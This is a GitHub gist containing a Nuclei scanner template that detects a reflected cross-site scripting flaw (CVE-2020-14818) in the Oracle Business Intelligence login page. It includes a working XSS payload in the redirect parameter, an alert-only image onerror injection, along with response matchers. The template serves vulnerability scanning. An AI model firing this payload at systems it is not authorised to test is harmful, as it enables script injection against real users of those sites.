Skip to content

Instantly share code, notes, and snippets.

@rootsploit
Last active December 18, 2023 06:50
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save rootsploit/8e2300b1df937627961163cd3858181f to your computer and use it in GitHub Desktop.
Save rootsploit/8e2300b1df937627961163cd3858181f to your computer and use it in GitHub Desktop.
Nuclei Template for CVE-2020-14818: Oracle Business Intelligence - Reflected XSS
id: cve-2020-14818
info:
name: Oracle BI - XSS by @HackerOn2Wheels
author: RootSploit
severity: medium
description: Reflected Cross-site scripting (XSS) on Oracle Business Intelligence
requests:
- method: GET
path:
- '{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(1337)>'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bitechLogin.setup"
part: body
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment